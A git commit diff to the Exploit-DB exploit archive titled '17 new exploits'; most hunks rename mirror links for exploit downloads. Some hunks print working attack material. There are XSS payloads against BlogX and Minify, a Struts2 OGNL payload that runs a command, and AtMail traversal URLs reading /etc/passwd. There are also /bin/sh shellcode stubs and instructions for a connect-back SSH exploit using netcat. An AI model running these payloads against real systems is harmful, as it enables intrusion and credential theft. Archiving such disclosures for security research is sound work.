DB: 2015-05-15
17 new exploits
This commit is contained in:
Offensive Security
parent
c9501aad62
commit
b3321b3426
343 changed files with 855 additions and 616 deletions
|
|
@ -1,6 +1,6 @@
|
|||
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
|
||||
|
||||
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-08-18]
|
||||
|
|
|
|||
|
|
@ -10,7 +10,7 @@
|
|||
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.
|
||||
# A similar exploitation vector was also added lately in Padbuster v0.3:
|
||||
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15213.pl (padBuster.pl)
|
||||
#
|
||||
#
|
||||
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
|
||||
|
|
|
|||
13
platforms/asp/webapps/37015.txt
Executable file
13
platforms/asp/webapps/37015.txt
Executable file
|
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/52730/info
|
||||
|
||||
Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b
|
||||
|
||||
http://www.example.com/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b
|
||||
|
||||
http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT>
|
||||
|
||||
http://www.example.com/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0
|
||||
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
# for working with this exploit you need two asp file for updating hash you can download both from :
|
||||
# www.abysssec.com/files/dana.zip
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8719.zip (2009-dana.zip)
|
||||
|
||||
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
|
||||
|
||||
|
|
|
|||
|
|
@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
|
|||
improper handling of environment variables.
|
||||
|
||||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12090.pdf (cybsec_advisory_2010_0404.pdf)
|
||||
|
|
@ -14,4 +14,4 @@ Vulnerability Description:
|
|||
Some files that allow to obtain usernames and other internal information can be read by any user inside
|
||||
the CLI.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12091.pdf (cybsec_advisory_2010_0403.pdf)
|
||||
|
|
@ -196,7 +196,7 @@ Kingcope
|
|||
A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.
|
||||
|
||||
the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17462.tar.gz (ssh_0day.tar.gz)
|
||||
|
||||
run like ./ssh -1 -z <yourip> <target>
|
||||
setup a netcat, port 443 on yourip first
|
||||
|
|
|
|||
|
|
@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
|
|||
/Signed "the awesome" Kingcope
|
||||
|
||||
Code:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18181.tar (7350roaringbeastv3.tar)
|
||||
|
||||
|
|
|
|||
|
|
@ -15,4 +15,4 @@ improper profile check.
|
|||
===========
|
||||
Download:
|
||||
===========
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf)
|
||||
|
|
@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com
|
|||
===============
|
||||
Download
|
||||
===============
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Sony_Ericsson.rar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11043.rar (Sony_Ericsson.rar)
|
||||
|
|
@ -15,4 +15,4 @@ Users inside the CLI can run some kind of “Fork Bomb” in order to saturate s
|
|||
of an insecure ulimit value.
|
||||
|
||||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0401.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12093.pdf (cybsec_advisory_2010_0401.pdf)
|
||||
|
|
@ -1,3 +1,3 @@
|
|||
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/savysoda_poc.xls
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13823.xls (savysoda_poc.xls)
|
||||
|
|
@ -1,3 +1,3 @@
|
|||
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/office2_poc.xls
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13824.xls (office2_poc.xls)
|
||||
|
|
@ -1,3 +1,3 @@
|
|||
I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/goodreader_poc.xls
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13825.xls (goodreader_poc.xls)
|
||||
|
|
@ -27,7 +27,7 @@ POC/EXPLOIT
|
|||
you can open this url with the browser or send mms with this image.
|
||||
|
||||
http://es.geocities.com/jplopezy/nokiacrash.jpg
|
||||
alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-nokiacrash.jpg
|
||||
alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8013.jpg (2009-nokiacrash.jpg)
|
||||
|
||||
------------------------------------------------------
|
||||
Juan Pablo Lopez Yacubian
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@
|
|||
# V100R001B121Telmex
|
||||
# Exploit Download Link:
|
||||
# http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HG520_udpinfo.tar.gz
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12298.tar.gz (HG520_udpinfo.tar.gz)
|
||||
|
||||
|
||||
By sending a specially crafted UDP packet you can remotely obtain the
|
||||
|
|
|
|||
|
|
@ -7,6 +7,6 @@
|
|||
# Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
|
||||
# CVE : No CVE US-CERT VU#723755
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/reaver-1.1.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18291.tar.gz (reaver-1.1.tar.gz)
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07182006-btvoyager.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2034.tgz (07182006-btvoyager.tgz)
|
||||
|
||||
# milw0rm.com [2006-07-18]
|
||||
|
|
|
|||
|
|
@ -22,10 +22,12 @@ A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
|
|||
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
|
||||
their work that helped make this happen. You can visit the dev team's
|
||||
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
|
||||
|
||||
EDB Note: Old filename: 10112007-iphone.tif
|
||||
-->
|
||||
|
||||
<html>
|
||||
<img src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10112007-iphone.tif">
|
||||
<img src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4522.tif">
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2007-10-11]
|
||||
|
|
|
|||
|
|
@ -197,7 +197,7 @@ name="backdoor">
|
|||
|
||||
Proof-of-concept brute force tool available at
|
||||
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Louhi_CMC-brute_090323.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip)
|
||||
|
||||
|
||||
Other information:
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
The pdf is located at:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lynn-cisco.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13294.pdf (lynn-cisco.pdf)
|
||||
|
||||
/str0ke
|
||||
|
||||
|
|
|
|||
|
|
@ -16,5 +16,5 @@ firmware versions have been confirmed to date:
|
|||
Detailed description available here:
|
||||
http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf
|
||||
|
||||
POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hnap0wn.tar.gz
|
||||
POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11101.tar.gz (hnap0wn.tar.gz)
|
||||
|
||||
|
|
|
|||
|
|
@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti
|
|||
logged-in user.
|
||||
|
||||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0402.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092.pdf (cybsec_advisory_2010_0402.pdf)
|
||||
|
|
@ -1,3 +1,3 @@
|
|||
The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ios_pdf_exploit.7z
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14538.7z (ios_pdf_exploit.7z)
|
||||
9
platforms/java/webapps/37006.txt
Executable file
9
platforms/java/webapps/37006.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/52672/info
|
||||
|
||||
Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Minify 2.1.3 and 2.1.4-beta are vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.exmaple.com/min/builder/#g=[XSS]
|
||||
21
platforms/java/webapps/37009.xml
Executable file
21
platforms/java/webapps/37009.xml
Executable file
|
|
@ -0,0 +1,21 @@
|
|||
source: http://www.securityfocus.com/bid/52702/info
|
||||
|
||||
Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8" ?>
|
||||
<xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform"
|
||||
version="1.0" xmlns:ognl="ognl.Ognl">
|
||||
<xsl:template match="/">
|
||||
<html>
|
||||
<body>
|
||||
<h2>hacked by kxlzx</h2>
|
||||
<h2>http://www.example.com</h2>
|
||||
<exp>
|
||||
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
|
||||
</exp>
|
||||
</body>
|
||||
</html>
|
||||
</xsl:template>
|
||||
</xsl:stylesheet>
|
||||
|
|
@ -52,10 +52,10 @@ _start:
|
|||
int
|
||||
main(void)
|
||||
{
|
||||
char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56=
|
||||
\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
|
||||
char *shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
|
||||
"\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
|
||||
|
||||
printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
|
||||
printf("strlen(shellcode)=%d\n", strlen(shellcode));
|
||||
|
||||
((void (*)(void))shellcode)();
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
# linux/x86 xor-encoded Connect Back Shellcode 371 bytes
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13366.tar.gz (black-RXenc-con-back.tar.gz)
|
||||
|
||||
# milw0rm.com [2006-04-18]
|
||||
|
|
@ -49,12 +49,12 @@ _start:
|
|||
int
|
||||
main(void)
|
||||
{
|
||||
char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68=
|
||||
\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
|
||||
char *shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68"
|
||||
"\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
|
||||
|
||||
printf("strlen(shellcode)=3D%d\n", strlen(shellcode));
|
||||
printf("strlen(shellcode)=%d\n", strlen(shellcode));
|
||||
|
||||
((void (*)(void))shellcode)();
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
|
@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
|
|||
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2)
|
||||
|
|
@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi
|
|||
|
||||
Expat 2.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-1.gz (2009-11-22-36097.gz)
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-2.gz (2009-11-22-36097-2.gz)
|
||||
|
|
@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera
|
|||
Versions up to and including libTIFF 3.9.4 are vulnerable.
|
||||
|
||||
PoC:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14573.tif.gz (lp589145-sample.tif.gz)
|
||||
|
|
@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki
|
|||
|
||||
--
|
||||
http://pi3.com.pl
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)
|
||||
http://blog.pi3.com.pl/?p=277
|
||||
|
|
|
|||
|
|
@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils
|
|||
|
||||
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
|
||||
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081
|
||||
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin
|
||||
|
||||
...
|
||||
$ strings strings-bfd-badptr2
|
||||
|
|
|
|||
|
|
@ -24,6 +24,6 @@ X Protocol Version 11, Revision 0, Release 7.0
|
|||
r00t # id
|
||||
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...
|
||||
|
||||
# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/xmodulepath.tgz
|
||||
# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1596.tgz (xmodulepath.tgz)
|
||||
|
||||
# milw0rm.com [2006-03-20]
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@ that data is overwritten again correctly by a program' function).
|
|||
.bss section is in higher addresses than .dtors section, so, we
|
||||
can't hijack .dtors to....
|
||||
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05262006-tiffspl33t.tar.gz
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz)
|
||||
|
||||
nitr0us <nitrousenador[at]gmail[dot]com>
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
//
|
||||
// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2014-5119.tar.gz
|
||||
// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34421.tar.gz (CVE-2014-5119.tar.gz)
|
||||
//
|
||||
//
|
||||
// ---------------------------------------------------
|
||||
|
|
|
|||
|
|
@ -10,7 +10,7 @@ but disabling it is a matter of running setenforce 0 as root.
|
|||
|
||||
|
||||
Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/redstarroot.rpm
|
||||
Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35749.rpm (redstarroot.rpm)
|
||||
|
||||
|
||||
## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04132007-pr0ftpd_modctrls.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz)
|
||||
|
||||
# milw0rm.com [2007-04-13]
|
||||
|
|
|
|||
|
|
@ -3,6 +3,6 @@ PostgreSQL UDF for command execution
|
|||
[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html
|
||||
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz
|
||||
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_postgresqludf_sys_0.0.1.tar.gz
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-01-25]
|
||||
|
|
|
|||
|
|
@ -3,6 +3,6 @@ MySQL UDF for command execution
|
|||
[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
|
||||
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
|
||||
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz
|
||||
mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-01-25]
|
||||
|
|
|
|||
|
|
@ -301,6 +301,6 @@
|
|||
|
||||
http://grsecurity.net/~spender/cheddar_bay.tgz
|
||||
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-cheddar_bay.tgz
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9191.tgz (2009-cheddar_bay.tgz)
|
||||
|
||||
# milw0rm.com [2009-07-17]
|
||||
|
|
|
|||
|
|
@ -50,6 +50,6 @@ i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz
|
|||
GenuineIntel GNU/Linux
|
||||
------------------------------------
|
||||
|
||||
download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-pulseaudio-exp.tar.gz
|
||||
download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-07-20]
|
||||
|
|
|
|||
|
|
@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4
|
|||
*/
|
||||
|
||||
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-wunderbar_emporium.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
|||
|
|
@ -4,6 +4,6 @@
|
|||
Quick and dirty exploit for this one:
|
||||
|
||||
http://www.frasunek.com/proto_ops.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-proto_ops.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz)
|
||||
|
||||
# milw0rm.com [2009-08-14]
|
||||
|
|
|
|||
|
|
@ -16,6 +16,6 @@
|
|||
*/
|
||||
|
||||
main: http://grsecurity.net/~spender/therebel.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-therebel.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz (2009-therebel.tgz)
|
||||
|
||||
# milw0rm.com [2009-09-02]
|
||||
|
|
|
|||
|
|
@ -5,6 +5,6 @@ systems, it automatically searches in the SELinux policy rules for
|
|||
types with mmap_zero permission it can transition, and tries to exploit
|
||||
the system with that types.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage2.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-09-09]
|
||||
|
|
|
|||
|
|
@ -37,6 +37,6 @@
|
|||
*/
|
||||
|
||||
http://www.grsecurity.net/~spender/enlightenment.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-enlightenment.tgz
|
||||
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9627.tgz (2009-enlightenment.tgz)
|
||||
|
||||
# milw0rm.com [2009-09-10]
|
||||
|
|
|
|||
|
|
@ -4,6 +4,6 @@ pointer workaround for data items addressing on ppc64 (i.e. functions
|
|||
on exploit code and libc can be referenced); Improved search and
|
||||
transition to SELinux types with mmap_zero permission.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage3.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-09-11]
|
||||
|
|
|
|||
|
|
@ -2,6 +2,6 @@
|
|||
# solareclipse at phreedom dot org
|
||||
# GPG key ID: E36B11B7
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12262006-proftpd-not-pro-enough.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz)
|
||||
|
||||
# milw0rm.com [2003-10-15]
|
||||
|
|
|
|||
13
platforms/linux/remote/37007.txt
Executable file
13
platforms/linux/remote/37007.txt
Executable file
|
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/52684/info
|
||||
|
||||
AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to obtain sensitive information, upload arbitrary code, and run it in the context of the webserver process.
|
||||
|
||||
Atmail 1.04 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&Attachment[]=/../../../../../../../../../etc/passwd
|
||||
|
||||
https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd
|
||||
|
||||
https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html
|
||||
|
|
@ -52,6 +52,6 @@
|
|||
**
|
||||
*/
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-x2_fc6f7f8.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz)
|
||||
|
||||
# milw0rm.com [2008-04-06]
|
||||
|
|
|
|||
|
|
@ -17,7 +17,7 @@
|
|||
# Autor: hitz - WarCat team (warcat.no-ip.org)
|
||||
# Collaborator: pretoriano
|
||||
#
|
||||
# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||
#
|
||||
# 2. Extract it to a directory
|
||||
#
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
Download:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ximage_zgv.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz)
|
||||
|
||||
# milw0rm.com [2004-10-28]
|
||||
|
|
|
|||
|
|
@ -36,6 +36,6 @@ struct versions vers[VERSN] =
|
|||
{"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024}
|
||||
};
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lsa.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7701.zip (2009-lsa.zip)
|
||||
|
||||
# milw0rm.com [2009-01-08]
|
||||
|
|
|
|||
|
|
@ -8,7 +8,7 @@
|
|||
# CVE : No CVE, no patch just 0Day
|
||||
# State : Critical
|
||||
|
||||
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/zimbraexploit_rubina119.zip
|
||||
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
|
||||
|
||||
---------------Description-----------------
